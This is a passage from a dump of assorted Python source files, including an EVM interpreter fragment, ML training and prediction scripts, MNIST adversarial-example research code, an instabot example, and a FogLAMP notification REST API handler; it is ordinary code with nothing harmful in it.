accounts_to_delete=dict(),\n has_erred=False,\n children=[],\n )\n try:\n\n if evm.message.code_address in PRE_COMPILED_CONTRACTS:\n PRE_COMPILED_CONTRACTS[evm.message.code_address](evm)\n return evm\n\n while evm.running and evm.pc < len(evm.code):\n try:\n op = Ops(evm.code[evm.pc])\n except ValueError:\n raise InvalidOpcode(evm.code[evm.pc])\n\n op_implementation[op](evm)\n\n except (\n OutOfGasError,\n InvalidOpcode,\n InvalidJumpDestError,\n InsufficientFunds,\n StackOverflowError,\n StackUnderflowError,\n StackDepthLimitError,\n ):\n evm.gas_left = U256(0)\n evm.logs = ()\n evm.accounts_to_delete = dict()\n evm.refund_counter = U256(0)\n evm.has_erred = True\n except (\n EnsureError,\n ValueError,\n ):\n evm.has_erred = True\n finally:\n return evm\n\n\ndef collect_touched_accounts(\n evm: Evm, ancestor_had_error: bool = False\n) -> Iterable[Address]:\n \"\"\"\n Collect all of the accounts that *may* need to be deleted based on\n `EIP-161 `_.\n Checking whether they *do* need to be deleted happens in the caller.\n See also: https://github.com/ethereum/EIPs/issues/716\n\n Parameters\n ----------\n evm :\n The current EVM frame.\n ancestor_had_error :\n True if the ancestors of the evm object erred else False\n\n Returns\n -------\n touched_accounts: `typing.Iterable`\n returns all the accounts that were touched and may need to be deleted.\n \"\"\"\n # collect the coinbase account if it was touched via zero-fee transfer\n if (evm.message.caller == evm.env.origin) and evm.env.gas_price == 0:\n yield evm.env.coinbase\n\n # collect those explicitly marked for deletion\n # (\"beneficiary\" is of SELFDESTRUCT)\n for beneficiary in sorted(set(evm.accounts_to_delete.values())):\n if evm.has_erred or ancestor_had_error:\n # Special case to account for geth+parity bug\n # https://github.com/ethereum/EIPs/issues/716\n if beneficiary == RIPEMD160_ADDRESS:\n yield beneficiary\n continue\n else:\n yield beneficiary\n\n # collect account directly addressed\n if not isinstance(evm.message.target, 
Bytes0):\n if evm.has_erred or ancestor_had_error:\n # collect RIPEMD160 precompile even if ancestor evm had error.\n # otherwise, skip collection from children of erred-out evm objects\n if evm.message.target == RIPEMD160_ADDRESS:\n yield evm.message.target\n else:\n yield evm.message.target\n\n # recurse into nested computations\n # (even erred ones, since looking for RIPEMD160)\n for child in evm.children:\n yield from collect_touched_accounts(\n child, ancestor_had_error=(evm.has_erred or ancestor_had_error)\n )\n\n\ndef collect_accounts_to_delete(\n evm: Evm, accounts_to_delete: Set[Address]\n) -> Set[Address]:\n \"\"\"\n Collects all the accounts that need to deleted from the `evm` object and\n its children\n\n Parameters\n ----------\n evm :\n The current EVM frame.\n accounts_to_delete :\n list of accounts that need to be deleted.\n Note: An empty set should be passed to this parameter. This set\n is used to store the results obtained by recursively iterating over the\n child evm objects\n\n Returns\n -------\n touched_accounts: `set`\n returns all the accounts that were touched and may need to be deleted.\n \"\"\"\n if not evm.has_erred:\n for address in evm.accounts_to_delete.keys():\n accounts_to_delete.add(address)\n for child in evm.children:\n collect_accounts_to_delete(child, accounts_to_delete)\n return accounts_to_delete\n"} {"ext": "py", "sha": "1a2ff4f07e115816c75cad8a5fba6e76c1da9375", "content": "import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"simplevae\", # Replace with your own username\n version=\"1.0.0\",\n author=\"Chenxi Wu, Yizi Zhang\",\n author_email=\"chenxi.wu@duke.edu, yizi.zhang@duke.edu\",\n description=\"Final project of STA 663: Implementation of Variational Autoencoder\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/yizi0511/sta_663_vae\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n\t\"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=[\n 'numpy',\n\t'tensorflow',\n ],\n)\n"} {"ext": "py", "sha": "1a2ff60432bc1611b23789f0e3b556f4022df84f", "content": "from definitions import PATH_INPUT_CSV, PATH_OUTPUT_GEOJSON\nfrom modules.geojson.df_to_geojson import df_to_geojson\nfrom modules.geojson.export_geojson import export_geojson\nfrom modules.init.init_program import init_program\nimport pandas as pd\n\ndef main():\n\n # init\n init_program()\n\n # actions to perform...\n df = pd.read_csv(PATH_INPUT_CSV)\n cols = [\"provnum\",\"name\",\"address\",\"city\",\"state\",\"zip\",\"county\",\"bedcert\",\"ownership\",\"employee_cases\",\n \"resident_cases\", \"resident_deaths\",\"cna_hprd\",'lpn_hprd',\"rn_hprd\",\"total_hprd\"]\n geojson_dict = df_to_geojson(df, cols, lon=\"google_long\", lat=\"google_lat\")\n export_geojson(geojson_dict, PATH_OUTPUT_GEOJSON)\n\n\n\n\nif __name__ == '__main__':\n main()"} {"ext": "py", "sha": "1a2ff622703e4f13a0742c22b66b54ea0b634262", "content": "from lstm import BilstmAttention\r\nfrom config import LSTMConfig\r\nimport torch\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport os\r\nimport directory\r\n\r\n\r\ndef load_model(weight_path):\r\n print(weight_path)\r\n model = BilstmAttention(embed_num=859)\r\n model.load_state_dict(torch.load(weight_path)) # 返回的是一个OrderDict,存储了网络结构的名字和对应的参数\r\n model.to(device)\r\n model.eval()\r\n return 
model\r\n\r\n\r\n@torch.no_grad()\r\ndef predict(texts):\r\n pres_all = []\r\n for text in tqdm(texts):\r\n text = [int(i) for i in text.split(' ')]\r\n # 统一样本的长度,这里选择55个词语作为样本长度,多的截断,少的补齐(用858补齐)\r\n seq_len = LSTMConfig.seq_len\r\n if len(text) > seq_len:\r\n text = text[:seq_len]\r\n else:\r\n text = text + [858] * (seq_len - len(text))\r\n\r\n text = torch.from_numpy(np.array(text))\r\n text = text.unsqueeze(0)\r\n text = text.type(torch.LongTensor).cuda()\r\n #\r\n for i in range(len(model_list)):\r\n model = model_list[i]\r\n outputs = model(text)\r\n outputs = outputs.sigmoid().detach().cpu().numpy()[0]\r\n if i == 0:\r\n pres_fold = outputs / len(model_list)\r\n else:\r\n pres_fold += outputs / len(model_list)\r\n\r\n # print(\"bilstm+attention_pres_fold:\",pres_fold)\r\n # print(\"bilstm+attention_pres_fold:\",type(pres_fold))\r\n pres_fold = [str(p) for p in pres_fold]\r\n pres_fold = ' '.join(pres_fold)\r\n pres_all.append(pres_fold)\r\n return pres_all\r\n\r\n\r\nif __name__ == \"__main__\":\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n model_list = []\r\n n_splits = LSTMConfig.n_splits\r\n\r\n for i in range(n_splits):\r\n model_list.append(load_model('./dl/user_data/model_data/label1/LSTMfold_' + str(i + 1) + '_best.pth'))\r\n\r\n test_df = pd.read_csv(directory.SEMI_TEST_SET_B_PATH, header=None)\r\n\r\n test_df.columns = ['report_ID', 'description']\r\n submit = test_df.copy()\r\n print(\"test_df:{}\".format(test_df.shape))\r\n new_des = [i.strip('|').strip() for i in test_df['description'].values]\r\n\r\n '''\r\n # 获取停用词\r\n stopwords_path = './dl/code/test/label1/stopwords.txt'\r\n stopwords = []\r\n with open(stopwords_path, 'r', encoding='utf-8') as f:\r\n for line in f:\r\n if len(line) > 0:\r\n stopwords.append(line.strip())\r\n # 去掉new_des_test中的停用词\r\n for j in range(0, len(new_des)):\r\n str2lst = new_des[j].split()\r\n copy = str2lst[:]\r\n for i in copy:\r\n if i in stopwords:\r\n copy.remove(i)\r\n str2lst = copy\r\n lst2str = \" \".join(str(i) for i in str2lst)\r\n new_des[j] = lst2str\r\n '''\r\n\r\n test_df['description'] = new_des\r\n sub_id = test_df['report_ID'].values\r\n\r\n print(sub_id[0])\r\n save_dir = './dl/prediction_result/label1/'\r\n\r\n if not os.path.exists(save_dir):\r\n os.makedirs(save_dir)\r\n\r\n pres_all = predict(new_des)\r\n\r\n str_w = ''\r\n with open(save_dir + 'submit_lstm.csv', 'w') as f:\r\n for i in range(len(sub_id)):\r\n str_w += sub_id[i] + ',' + '|' + pres_all[i] + '\\n'\r\n str_w = str_w.strip('\\n')\r\n f.write(str_w)\r\n"} {"ext": "py", "sha": "1a2ff66e092665412a561a2125c1879ca5d1d219", "content": "# Copyright 2016 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Util class for job-related operations.\n\"\"\"\n\nimport contextlib\nimport os\n\nfrom taskflow import engines\nfrom taskflow.persistence import logbook\n\nfrom oslo_utils import uuidutils\n\nfrom pipeline.pipelines import pipeline_factory\nfrom pipeline.utils import backend_helper\n\n\ndef post_remote_pipeline_job(pipeline):\n ME = os.getpid()\n print(\"Starting poster with pid: %s\" % ME)\n my_name = \"poster-%s\" % ME\n persist_backend = backend_helper.default_persistence_backend()\n with contextlib.closing(persist_backend):\n with contextlib.closing(persist_backend.get_connection()) as conn:\n conn.upgrade()\n job_backend = backend_helper.default_jobboard_backend(my_name)\n job_backend.connect()\n with contextlib.closing(job_backend):\n # Create information in the persistence backend about the\n # unit of work we want to complete and the factory that\n # can be called to create the tasks that the work unit needs\n # to be done.\n lb = logbook.LogBook(\"post-from-%s\" % my_name)\n fd = logbook.FlowDetail(\"sample-from-%s\" % my_name,\n uuidutils.generate_uuid())\n lb.add(fd)\n with contextlib.closing(persist_backend.get_connection()) as conn:\n conn.save_logbook(lb)\n\n engines.save_factory_details(fd,\n pipeline_factory.make_pipeline_flow,\n [pipeline.name],\n pipeline.kwargs,\n backend=persist_backend)\n # Post, and be done with it!\n jb = job_backend.post(\"sample-job-from-%s\" % my_name, book=lb)\n print(\"Posted: %s\" % jb)\n return jb\n"} {"ext": "py", "sha": "1a2ff7c55b8ed076fa46d310054279a8163972e9", "content": "import csv\nimport random\nfrom functools import partial\nfrom typing import Callable, Optional\nfrom pdb import set_trace as st\nimport os\nimport random\nimport pandas as pd\nfrom typing import Any, Callable, Dict, Iterable, List, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\nfrom foolbox.attacks import (\n FGSM,\n Attack,\n DeepFoolAttack,\n IterativeGradientSignAttack,\n SaliencyMapAttack,\n)\n# from foolbox.criteria import TargetClass\n# from foolbox.models import TensorFlowModel\nfrom tensorflow.python.training import saver\nfrom tensorflow.python.training.session_manager import SessionManager\nimport tensorflow as tf\nimport numpy as np\nimport pickle\nimport sklearn.metrics as metrics\nimport scipy.ndimage as ndimage\nimport matplotlib.pyplot as plt\nplt.switch_backend('Agg')\n\nfrom model.config import LENET\nfrom model import LeNet\nimport nninst_mode as mode\nfrom dataset import mnist\nfrom dataset.config import MNIST_TRAIN, MNIST_PATH\nfrom dataset.mnist_transforms import *\nfrom trace.lenet_mnist_class_trace_v2 import (\n data_config,\n)\nfrom trace.common import (\n class_trace,\n)\nfrom tf_utils import new_session_config\nfrom nninst_statistics import calc_trace_side_overlap\nfrom nninst_trace import TraceKey\nfrom nninst_utils.numpy import arg_approx\nfrom nninst_utils.ray import ray_init\nfrom nninst_utils.fs import ensure_dir, IOAction, CsvIOAction, 
abspath\n\nfrom eval.common import get_overlay_summary, clean_overlap_ratio, \\\n translation_overlap_ratio, attack_overlap_ratio, \\\n lenet_mnist_example\nfrom eval.cw_attack import cw_generate_adversarial_example\nfrom eval.eval_mnist import foolbox_generate_adversarial_example\nfrom eval.cw_attacks import CarliniL2\nfrom nninst_graph import AttrMap, Graph, GraphAttrKey\nfrom nninst_utils.ray import ray_iter\nfrom tf_graph import (\n MaskWeightWithTraceHook,\n model_fn_with_fetch_hook,\n)\nfrom trace.common import (\n get_predicted_value,\n get_rank,\n predict,\n reconstruct_class_trace_from_tf,\n reconstruct_trace_from_tf,\n reconstruct_trace_from_tf_brute_force,\n)\nfrom eval.eval_by_reduced_point import reconstruct_point\nfrom nninst_op import *\nfrom nninst_trace import calc_padding\n\nthreshold = 0.9\ndilation_iter = 1\ndilation_structure = ndimage.generate_binary_structure(2, 2)\n# Model config\nmodel_label = \"augmentation\"\nmodel_dir = f\"result/lenet/model_{model_label}\"\n# Trace config\ntrace_dir = f\"{model_dir}/traces_{threshold}\"\ntrace_name = \"noop\"\ntraining_trace_dir = f\"{model_dir}/per_image_trace_{threshold}/train\"\n# Result dir\nresult_name = \"test\"\n\nresult_dir = f\"{model_dir}/birelation/{threshold}_{dilation_iter}\"\n# result_dir = f\"result/lenet/test\"\nimages_per_class = 1000\nattack_name = \"FGSM\"\n\nattacks = {\n \"FGSM\": [FGSM],\n \"BIM\": [IterativeGradientSignAttack],\n \"JSMA\": [SaliencyMapAttack],\n \"DeepFool\": [DeepFoolAttack],\n # \"DeepFool_full\": [DeepFoolAttack, dict(subsample=None)],\n # \"CWL2\": [CarliniL2],\n}\n\n# DeepFool will shutdown when num_gpu<0.2\nnum_gpus = 0.2\n\noverlap_fn = calc_trace_side_overlap\nper_channel = False\n\nlenet_mnist_class_trace = class_trace(\n trace_name,\n model_config=LENET,\n data_config=data_config,\n )\n\ngraph = LENET.network_class.graph().load()\n\n\ndef reconstruct_edge_from_trace(\n trace,\n graph,\n node_name,\n key = TraceKey.EDGE,\n):\n attrs = trace.nodes[node_name]\n op = graph.op(graph.id(node_name))\n if key not in attrs:\n return None\n else:\n attr = attrs[key]\n edge = TraceKey.to_array(attr)\n return edge\n\n\ndef reconstruct_point_from_trace_contrib(\n trace,\n graph,\n node_name,\n key = TraceKey.POINT,\n):\n\n attrs = trace.nodes[node_name]\n\n def to_bitmap(shape, attr, contrib):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n pos_attr = attr[contrib > 0]\n mask[TraceKey.to_array(pos_attr)] = 1\n neg_attr = attr[contrib < 0]\n mask[TraceKey.to_array(neg_attr)] = -1\n return mask.reshape(shape)\n\n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key], attrs[TraceKey.POINT_CONTRIB])\n else:\n for attr_name, attr in attrs.items():\n if attr_name.startswith(TraceKey.POINT + \".\") and attr is not None:\n return to_bitmap(attrs[TraceKey.POINT_SHAPE], attr)\n RuntimeError(f\"Point key not found in {node_name}\")\n\ndef reconstruct_point_from_trace(\n trace,\n graph,\n node_name,\n key = TraceKey.POINT,\n):\n\n attrs = trace.nodes[node_name]\n\n def to_bitmap(shape, attr):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n mask[TraceKey.to_array(attr)] = 1\n return mask.reshape(shape)\n\n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key])\n else:\n for attr_name, attr in attrs.items():\n if attr_name.startswith(TraceKey.POINT + \".\") and attr is not None:\n return to_bitmap(attrs[TraceKey.POINT_SHAPE], attr)\n RuntimeError(f\"Point key not found in {node_name}\")\n\ndef reconstruct_weight_from_trace_contrib(\n trace,\n graph,\n node_name,\n 
key = TraceKey.WEIGHT,\n):\n attrs = trace.nodes[node_name]\n def to_bitmap(shape, attr, contrib):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n mask[TraceKey.to_array(attr)] = contrib\n return mask.reshape(shape)\n \n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key], attrs[TraceKey.WEIGHT_CONTRIB])\n else:\n RuntimeError(f\"Weight key not found in {node_name}\")\n\ndef reconstruct_weight_from_trace(\n trace,\n graph,\n node_name,\n key = TraceKey.WEIGHT,\n):\n attrs = trace.nodes[node_name]\n def to_bitmap(shape, attr):\n mask = np.zeros(np.prod(shape), dtype=np.int8)\n mask[TraceKey.to_array(attr)] = 1\n return mask.reshape(shape)\n if key in attrs:\n return to_bitmap(attrs[key + \"_shape\"], attrs[key])\n else:\n RuntimeError(f\"Weight key not found in {node_name}\")\n\n\ndef reconstruct_point_fn(\n trace,\n):\n node_names = []\n key = TraceKey.POINT\n for attr_name, attr in trace.nodes.items():\n if key in attr:\n node_names.append(attr_name)\n point_dict = {}\n for node_name in [\n \"conv2d/Relu:0\",\n \"conv2d_1/Relu:0\",\n \"dense/BiasAdd:0\",\n \"dense_1/BiasAdd:0\",\n ]:\n point_dict[node_name] = reconstruct_point_from_trace(\n trace,\n graph,\n node_name,\n )\n # print(node_name, point_dict[node_name].shape)\n return point_dict\n\ndef reconstruct_weight_fn(\n trace,\n):\n weight_dict = {}\n for node_name in [\n \"conv2d/Conv2D\",\n \"conv2d_1/Conv2D\",\n ]:\n weight = reconstruct_weight_from_trace(\n trace,\n graph,\n node_name,\n )\n weight = weight.reshape(-1, weight.shape[-2], weight.shape[-1])\n weight_dict[node_name] = weight\n return weight_dict\n\nreconstruct_edge_fn = partial(\n reconstruct_edge_from_trace,\n graph = graph,\n key = TraceKey.EDGE\n)\n"} {"ext": "py", "sha": "1a2ff7d6ee544f38724df5d47c67ff7c9424e404", "content": "\"\"\"\n instabot example\n\n Workflow:\n Like user's, follower's media by user_id.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\nsys.path.append(os.path.join(sys.path[0], '../'))\nfrom instabot import Bot\n\nparser = argparse.ArgumentParser(add_help=True)\nparser.add_argument('-u', type=str, help=\"username\")\nparser.add_argument('-p', type=str, help=\"password\")\nparser.add_argument('-proxy', type=str, help=\"proxy\")\nparser.add_argument('users', type=str, nargs='+', help='users')\nargs = parser.parse_args()\n\nbot = Bot()\nbot.login(username=args.u, password=args.p,\n proxy=args.proxy)\n\nfor username in args.users:\n bot.like_followers(username, nlikes=3)\n"} {"ext": "py", "sha": "1a2ff90b8b9115aeed04b0e1d7443a0af43ffa46", "content": "from .flyweight import Flyweight\n"} {"ext": "py", "sha": "1a2ff916014c9c622853ba156b2f225dc12f0362", "content": "# -*- coding: utf-8 -*-\n\n# FOGLAMP_BEGIN\n# See: http://foglamp.readthedocs.io/\n# FOGLAMP_END\n\nimport json\nimport urllib.parse\nimport aiohttp\nfrom aiohttp import web\n\nfrom foglamp.common import utils\nfrom foglamp.common import logger\nfrom foglamp.common.service_record import ServiceRecord\nfrom foglamp.common.storage_client.exceptions import StorageServerError\nfrom foglamp.common.configuration_manager import ConfigurationManager\nfrom foglamp.services.core import connect\nfrom foglamp.services.core.service_registry.service_registry import ServiceRegistry\nfrom foglamp.services.core.service_registry import exceptions as service_registry_exceptions\nfrom foglamp.common.audit_logger import AuditLogger\n\n__author__ = \"Amarendra K Sinha\"\n__copyright__ = \"Copyright (c) 2018 Dianomic Systems\"\n__license__ = \"Apache 2.0\"\n__version__ = 
\"${VERSION}\"\n\n_help = \"\"\"\n -------------------------------------------------------------------------------\n | GET | /foglamp/notification/plugin |\n | GET POST PUT DELETE | /foglamp/notification |\n -------------------------------------------------------------------------------\n\"\"\"\n\n_logger = logger.setup()\nNOTIFICATION_TYPE = [\"one shot\", \"retriggered\", \"toggled\"]\n\n\nasync def get_plugin(request):\n \"\"\" GET lists of rule plugins and delivery plugins\n\n :Example:\n curl -X GET http://localhost:8081/foglamp/notification/plugin\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n url = 'http://{}:{}/notification/rules'.format(_address, _port)\n rule_plugins = json.loads(await _hit_get_url(url))\n\n url = 'http://{}:{}/notification/delivery'.format(_address, _port)\n delivery_plugins = json.loads(await _hit_get_url(url))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=ex)\n else:\n return web.json_response({'rules': rule_plugins, 'delivery': delivery_plugins})\n\n\nasync def get_type(request):\n \"\"\" GET the list of available notification types\n\n :Example:\n curl -X GET http://localhost:8081/foglamp/notification/type\n \"\"\"\n return web.json_response({'notification_type': NOTIFICATION_TYPE})\n\n\nasync def get_notification(request):\n \"\"\" GET an existing notification\n\n :Example:\n curl -X GET http://localhost:8081/foglamp/notification/\n \"\"\"\n try:\n notif = request.match_info.get('notification_name', None)\n if notif is None:\n raise ValueError(\"Notification name is required.\")\n\n notification = {}\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n notification_config = await config_mgr._read_category_val(notif)\n if notification_config:\n rule_config = await config_mgr._read_category_val(\"rule{}\".format(notif))\n delivery_config = await config_mgr._read_category_val(\"delivery{}\".format(notif))\n notification = {\n \"name\": notification_config['name']['value'],\n \"description\": notification_config['description']['value'],\n \"rule\": notification_config['rule']['value'],\n \"ruleConfig\": rule_config,\n \"channel\": notification_config['channel']['value'],\n \"deliveryConfig\": delivery_config,\n \"notificationType\": notification_config['notification_type']['value'],\n \"enable\": notification_config['enable']['value'],\n }\n else:\n raise ValueError(\"The Notification: {} does not exist.\".format(notif))\n except ValueError as ex:\n raise web.HTTPBadRequest(reason=str(ex))\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=ex)\n else:\n return web.json_response({'notification': notification})\n\n\nasync def get_notifications(request):\n \"\"\" GET list of notifications\n\n :Example:\n curl -X GET http://localhost:8081/foglamp/notification\n \"\"\"\n try:\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n all_notifications = await config_mgr._read_all_child_category_names(\"Notifications\")\n notifications = []\n for notification in all_notifications:\n notification_config = await config_mgr._read_category_val(notification['child'])\n notification = {\n \"name\": notification_config['name']['value'],\n \"rule\": notification_config['rule']['value'],\n \"channel\": 
notification_config['channel']['value'],\n \"notificationType\": notification_config['notification_type']['value'],\n \"enable\": notification_config['enable']['value'],\n }\n notifications.append(notification)\n except Exception as ex:\n raise web.HTTPInternalServerError(reason=ex)\n else:\n return web.json_response({'notifications': notifications})\n\n\nasync def post_notification(request):\n \"\"\"\n Create a new notification to run a specific plugin\n\n :Example:\n curl -X POST http://localhost:8081/foglamp/notification -d '{\"name\": \"Test Notification\", \"description\":\"Test Notification\", \"rule\": \"threshold\", \"channel\": \"email\", \"notification_type\": \"one shot\", \"enabled\": false}'\n curl -X POST http://localhost:8081/foglamp/notification -d '{\"name\": \"Test Notification\", \"description\":\"Test Notification\", \"rule\": \"threshold\", \"channel\": \"email\", \"notification_type\": \"one shot\", \"enabled\": false, \"rule_config\": {}, \"delivery_config\": {}}'\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n data = await request.json()\n if not isinstance(data, dict):\n raise ValueError('Data payload must be a valid JSON')\n\n name = data.get('name', None)\n description = data.get('description', None)\n rule = data.get('rule', None)\n channel = data.get('channel', None)\n notification_type = data.get('notification_type', None)\n enabled = data.get('enabled', None)\n rule_config = data.get('rule_config', {})\n delivery_config = data.get('delivery_config', {})\n\n if name is None or name.strip() == \"\":\n raise ValueError('Missing name property in payload.')\n if description is None:\n raise ValueError('Missing description property in payload.')\n if rule is None:\n raise ValueError('Missing rule property in payload.')\n if channel is None:\n raise ValueError('Missing channel property in payload.')\n if notification_type is None:\n raise ValueError('Missing notification_type property in payload.')\n\n if utils.check_reserved(name) is False:\n raise ValueError('Invalid name property in payload.')\n if utils.check_reserved(rule) is False:\n raise ValueError('Invalid rule property in payload.')\n if utils.check_reserved(channel) is False:\n raise ValueError('Invalid channel property in payload.')\n if notification_type not in NOTIFICATION_TYPE:\n raise ValueError('Invalid notification_type property in payload.')\n\n if enabled is not None:\n if enabled not in ['true', 'false', True, False]:\n raise ValueError('Only \"true\", \"false\", true, false are allowed for value of enabled.')\n is_enabled = \"true\" if ((type(enabled) is str and enabled.lower() in ['true']) or (\n (type(enabled) is bool and enabled is True))) else \"false\"\n\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n curr_config = await config_mgr.get_category_all_items(name)\n\n if curr_config is not None:\n raise ValueError(\"A Category with name {} already exists.\".format(name))\n\n try:\n # Get default config for rule and channel plugins\n url = '{}/plugin'.format(request.url)\n try:\n # When authentication is mandatory we need to pass token in request header\n auth_token = request.token\n except AttributeError:\n auth_token = None\n\n list_plugins = json.loads(await _hit_get_url(url, 
auth_token))\n r = list(filter(lambda rules: rules['name'] == rule, list_plugins['rules']))\n c = list(filter(lambda channels: channels['name'] == channel, list_plugins['delivery']))\n if len(r) == 0 or len(c) == 0: raise KeyError\n rule_plugin_config = r[0]['config']\n delivery_plugin_config = c[0]['config']\n except KeyError:\n raise ValueError(\"Invalid rule plugin {} and/or delivery plugin {} supplied.\".format(rule, channel))\n\n # Verify if rule_config contains valid keys\n if rule_config != {}:\n for k, v in rule_config.items():\n if k not in rule_plugin_config:\n raise ValueError(\"Invalid key {} in rule_config {} supplied for plugin {}.\".format(k, rule_config, rule))\n\n # Verify if delivery_config contains valid keys\n if delivery_config != {}:\n for k, v in delivery_config.items():\n if k not in delivery_plugin_config:\n raise ValueError(\n \"Invalid key {} in delivery_config {} supplied for plugin {}.\".format(k, delivery_config, channel))\n\n # First create templates for notification and rule, channel plugins\n post_url = 'http://{}:{}/notification/{}'.format(_address, _port, urllib.parse.quote(name))\n await _hit_post_url(post_url) # Create Notification template\n post_url = 'http://{}:{}/notification/{}/rule/{}'.format(_address, _port, urllib.parse.quote(name),\n urllib.parse.quote(rule))\n await _hit_post_url(post_url) # Create Notification rule template\n post_url = 'http://{}:{}/notification/{}/delivery/{}'.format(_address, _port, urllib.parse.quote(name),\n urllib.parse.quote(channel))\n await _hit_post_url(post_url) # Create Notification delivery template\n\n # Create configurations\n notification_config = {\n \"description\": description,\n \"rule\": rule,\n \"channel\": channel,\n \"notification_type\": notification_type,\n \"enable\": is_enabled,\n }\n await _update_configurations(config_mgr, name, notification_config, rule_config, delivery_config)\n\n audit = AuditLogger(storage)\n await audit.information('NTFAD', {\"name\": name})\n except ValueError as ex:\n raise web.HTTPBadRequest(reason=str(ex))\n except Exception as e:\n raise web.HTTPInternalServerError(reason=str(e))\n else:\n return web.json_response({'result': \"Notification {} created successfully\".format(name)})\n\n\nclass NotFoundError(Exception):\n pass\n\n\nasync def put_notification(request):\n \"\"\"\n Update an existing notification\n\n :Example:\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"description\":\"Test Notification modified\"}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"rule\": \"threshold\", \"channel\": \"email\"}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"notification_type\": \"one shot\", \"enabled\": false}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"enabled\": false}'\n curl -X PUT http://localhost:8081/foglamp/notification/ -d '{\"description\":\"Test Notification\", \"rule\": \"threshold\", \"channel\": \"email\", \"notification_type\": \"one shot\", \"enabled\": false, \"rule_config\": {}, \"delivery_config\": {}}'\n \"\"\"\n try:\n notification_service = ServiceRegistry.get(s_type=ServiceRecord.Type.Notification.name)\n _address, _port = notification_service[0]._address, notification_service[0]._port\n except service_registry_exceptions.DoesNotExist:\n raise web.HTTPNotFound(reason=\"No Notification service available.\")\n\n try:\n notif = request.match_info.get('notification_name', None)\n if notif is None:\n raise ValueError(\"Notification name is required for updation.\")\n\n # TODO: Stop 
notification before update\n\n data = await request.json()\n if not isinstance(data, dict):\n raise ValueError('Data payload must be a valid JSON')\n\n description = data.get('description', None)\n rule = data.get('rule', None)\n channel = data.get('channel', None)\n notification_type = data.get('notification_type', None)\n enabled = data.get('enabled', None)\n rule_config = data.get('rule_config', {})\n delivery_config = data.get('delivery_config', {})\n\n if utils.check_reserved(notif) is False:\n raise ValueError('Invalid notification instance name.')\n if rule is not None and utils.check_reserved(rule) is False:\n raise ValueError('Invalid rule property in payload.')\n if channel is not None and utils.check_reserved(channel) is False:\n raise ValueError('Invalid channel property in payload.')\n if notification_type is not None and notification_type not in NOTIFICATION_TYPE:\n raise ValueError('Invalid notification_type property in payload.')\n\n if enabled is not None:\n if enabled not in ['true', 'false', True, False]:\n raise ValueError('Only \"true\", \"false\", true, false are allowed for value of enabled.')\n is_enabled = \"true\" if ((type(enabled) is str and enabled.lower() in ['true']) or (\n (type(enabled) is bool and enabled is True))) else \"false\"\n\n storage = connect.get_storage_async()\n config_mgr = ConfigurationManager(storage)\n\n current_config = await config_mgr._read_category_val(notif)\n\n if current_config is None:\n raise NotFoundError('No {} notification instance found'.format(notif))\n\n rule_changed = True if rule is not None and rule != current_config['rule']['value'] else False\n channel_changed = True if channel is not None and channel != current_config['channel']['value'] else False\n\n try:\n # Get default config for rule and channel plugins\n url = str(request.url)\n url_parts = url.split(\"/foglamp/notification\")\n url = '{}/foglamp/notification/plugin'.format(url_parts[0])\n try:\n # When authentication is mandatory we need to pass token in request header\n auth_token = request.token\n except AttributeError:\n auth_token = None\n\n list_plugins = json.loads(await _hit_get_url(url, auth_token))\n search_rule = rule if rule_changed else current_config['rule']['value']\n r = list(filter(lambda rules: rules['name'] == search_rule, list_plugins['rules']))\n if len(r) == 0:\n raise KeyError\n rule_plugin_config = r[0]['config']\n\n search_channel = channel if channel_changed else current_config['channel']['value']\n c = list(filter(lambda channels: channels['name'] == search_channel, list_plugins['delivery']))\n if len(c) == 0:\n raise KeyError\n delivery_plugin_config = c[0]['config']\n except KeyError:\n raise ValueError(\"Invalid rule plugin:{} and/or delivery plugin:{} supplied.\".format(rule, channel))\n\n # Verify if rule_config contains valid keys\n if rule_config != {}:\n for k, v in rule_config.items():\n if k not in rule_plugin_config:\n raise ValueError(\"Invalid key:{} in rule plugin:{}\".format(k, rule_plugin_config))\n\n # Verify if delivery_config contains valid keys\n if delivery_config != {}:\n for k, v in delivery_config.items():\n if k not in delivery_plugin_config:\n raise ValueError(\n \"Invalid key:{} in delivery plugin:{}\".format(k, 